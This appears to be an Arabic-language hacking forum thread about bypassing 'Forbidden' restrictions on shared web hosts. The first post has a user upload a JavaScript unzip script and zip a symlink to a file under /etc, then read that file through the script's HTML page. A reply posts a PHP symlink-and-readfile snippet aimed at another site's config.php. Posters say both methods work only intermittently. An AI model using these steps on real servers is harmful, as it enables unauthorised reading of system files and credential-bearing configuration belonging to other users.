jav aScr ipt Unzip File's , And Bypass Forbidden

jav aScr ipt Unzip File’s , And Bypass Forbidden

السلام عليكم …

اخباركم

كل عام والجميع بخير

قبل الكل حبية انزله هنا … اول شئ الطريقه تحتاج لتطوير

وان شاء الله ابو الزوز B0x هنا ddd

http://cheeso.members.winisp.net/srcview.aspx?dir=js-unzip&file=JavascriptUnzip.zip

^^

نحمل السكربت ونرفعه
الان نروح لمسار الرفع
ونخش ملف zips
طيب نسوي

ln -s /etc… x.txt

بعدين

qzip x.txt > x.zip

الان نرجع لرئيسيه
ونعدل على ملف ZIpFile.htm

نفتح السورس ونحصل

    <div id='main' class='column'>
    <h1>Read a Zip file with Javascript</h1>
      <p><b>Select a zip file to read: </b></p>
    <div style='margin-left:20px;'>
      <select style='margin:2px 0px 12px 0px;' id="urlToLoad">
        <option>readme.zip</option>
        <option>Sudoku-Sample.xps</option>
        <option>Emma_Jane-Austen.epub</option>
        <option>tiny.zip</option>
        <option>zipWithinZip.zip</option>
        <option>squish.zip</option>
        <option>AntarcticaTemps.xlsx</option>
        

ونظيف اخر شئ الملف االمضغوط
<option>x.zip</option>
زي كذا

وبعدها نفتح zIpFile.htm

ونستعرض ملف x.zip

وباذن الله يتخطى الفروبيدن

بس هنا فيه مشكله

انه مايفتح بعض الاحيان وبعض الاحيان بمعجزه يفتح

نحتاج لافكاركم

في الاخير اوجه شكر

xss mAn
i-Hmx
x-shadow
sA^Dev!L

ddd

ننتظركم

فكرة جميلة جدا و ان شاء الله التجريب في اقرب وقت.

يعطيك العـافية … انا بشوف ان السكربت بيعتمد على تحميل الملف او القرائة من خلال JS
طيب خلينا نحكي على مستوى php
لو عندنا كود

<?php
symlink(“/home/b0x/domains/b0x.com/public_html/config.php”,“z1d.txt”);
readfile(“z1d.txt”);
?>

شي طبيعي ما يشتغل !!
لانه صلاحيتك يوزر الا اذا كان الكونفك مصرح … انا جربت الطريقة تبعتك لكنها فشلت … او يمكن انا مش عارف … نزل شرح فيديو و ان شاء الله خير :slight_smile:

السلام عليكم ورحمة الله وبركاته

وحش يا عم الحج …

مثل ما قال الشيخ الملتوي زيد …

يا ريت تسوي شرح فيديو …

ويعطيك العافية

وصانك يو على الاهداء < صيني …

ddd